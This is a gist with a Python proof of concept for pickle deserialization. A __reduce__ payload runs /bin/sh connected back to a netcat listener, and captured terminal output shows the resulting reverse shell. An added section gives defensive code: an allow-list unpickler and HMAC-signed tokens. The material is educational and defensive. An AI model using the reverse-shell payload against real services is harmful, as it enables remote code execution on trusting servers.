@inaz2
Last active August 29, 2015 14:08
```python
import cPickle
import subprocess
import base64
import socket

# connect back to the listener in terminal 2; the spawned shell's stdio is
# bound to this socket's file descriptor
s = socket.create_connection(('localhost', 5000))


class Exploit(object):
    # pickle serialises an instance as the (callable, args) pair returned by
    # __reduce__; on load the callable is invoked with those args, so Popen
    # runs as soon as the receiver unpickles the token
    def __reduce__(self):
        fd = s.fileno()
        return (subprocess.Popen,
                (('/bin/sh',),   # args
                 0,              # bufsize
                 None,           # executable
                 fd, fd, fd      # std{in,out,err}
                 ))


# token to be sent
token = base64.b64encode(cPickle.dumps(Exploit()))
print token

# load the received token (what a trusting server would do)
token = cPickle.loads(base64.b64decode(token))
print token['data']
```
```text
# terminal 1
$ python exploiting-pickle.py
Y3N1YnByb2Nlc3MKUG9wZW4KcDEKKChTJy9iaW4vc2gnCnAyCnRwMwpJMApOSTMKSTMKSTMKdFJwNC4u
Traceback (most recent call last):
  File "test.py", line 24, in <module>
    print token['data']
TypeError: 'Popen' object has no attribute '__getitem__'
```

```text
# terminal 2
$ nc -l 5000 -v
Listening on [0.0.0.0] (family 0, port 5000)
Connection from [127.0.0.1] port 5000 [tcp/*] accepted (family 2, sport 36824)
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
ps auxf
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
...
user      8926  0.0  0.0   4444   656 pts/1    S    18:09   0:00 /bin/sh
user      8933  0.0  0.1  19560  1324 pts/1    R    18:09   0:00  \_ ps auxf
```
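The gist's receiving side calls `cPickle.loads` on a client-supplied token, which is exactly the pattern the `__reduce__` payload abuses. The following is an added example, not part of inaz2's gist, written in Python 3 rather than the gist's Python 2, showing two mitigations for that server side: a `RestrictedUnpickler` whose `find_class` allow-list refuses to resolve `subprocess.Popen` or any other global before it can be called, and an HMAC-signed token format so that only tokens the server itself issued ever reach `pickle` at all. `SECRET_KEY`, `SAFE_GLOBALS`, `make_token`/`load_token` and the `BenignGadget` class are assumptions of this example; `BenignGadget` has the same `__reduce__` shape as the gist's `Exploit` but resolves to the harmless `os.getcwd` instead of `Popen`, so the demonstration executes nothing if it is ever loaded with the stock unpickler.

```python
"""Added example (not part of the gist): hardening the token pattern it attacks."""
import base64
import hashlib
import hmac
import io
import os
import pickle

# Globals a legitimate token (a dict of str/int/bytes values) may reference.
# Nothing from os, subprocess, builtins.eval, etc. is in this set.
SAFE_GLOBALS = {
    ("builtins", "dict"), ("builtins", "list"), ("builtins", "tuple"),
    ("builtins", "set"), ("builtins", "str"), ("builtins", "bytes"),
    ("builtins", "int"), ("builtins", "float"), ("builtins", "bool"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Resolve only allow-listed globals. The GLOBAL / STACK_GLOBAL opcode that
    a __reduce__ payload relies on goes through find_class, so a forbidden name
    aborts the load before the REDUCE opcode can invoke anything."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


# Constructed key for the example; a real service loads this from a secret store.
SECRET_KEY = b"constructed-example-key-do-not-reuse"


def make_token(payload: dict, key: bytes = SECRET_KEY) -> str:
    """Server-side issuance: HMAC-SHA256 tag prepended to the pickle bytes."""
    raw = pickle.dumps(payload, protocol=pickle.HIGHEST_PROTOCOL)
    tag = hmac.new(key, raw, hashlib.sha256).digest()
    return base64.b64encode(tag + raw).decode("ascii")


def load_token(token: str, key: bytes = SECRET_KEY) -> dict:
    """Server-side verification: reject forged tokens in constant time, then
    still unpickle through the allow-list as defence in depth."""
    blob = base64.b64decode(token)
    tag, raw = blob[:32], blob[32:]
    expected = hmac.new(key, raw, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("token signature invalid")
    return restricted_loads(raw)


class BenignGadget:
    """Same (callable, args) shape as the gist's Exploit.__reduce__, but the
    callable is os.getcwd, so loading it with plain pickle.loads is harmless."""

    def __reduce__(self):
        return (os.getcwd, ())


def forged_token() -> str:
    """An unsigned, attacker-style token (constructed for the example)."""
    return base64.b64encode(pickle.dumps(BenignGadget())).decode("ascii")


def check_unsigned_pickle(b64: str) -> str:
    """What the gist's receiver does, but through the restricted unpickler."""
    try:
        restricted_loads(base64.b64decode(b64))
        return "loaded"
    except pickle.UnpicklingError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    good = make_token({"data": "hello", "uid": 1000})
    print(load_token(good))
    print(check_unsigned_pickle(forged_token()))
    try:
        load_token(forged_token())
    except ValueError as exc:
        print("signature check:", exc)
```

The allow-list is the part that directly defeats the gist's payload: `find_class` sees `('subprocess', 'Popen')` and raises, so `Popen` is never called. The signature is the stronger control, because it keeps attacker-controlled bytes away from `pickle` entirely; keeping both means a bug in token handling does not reopen the deserialization path.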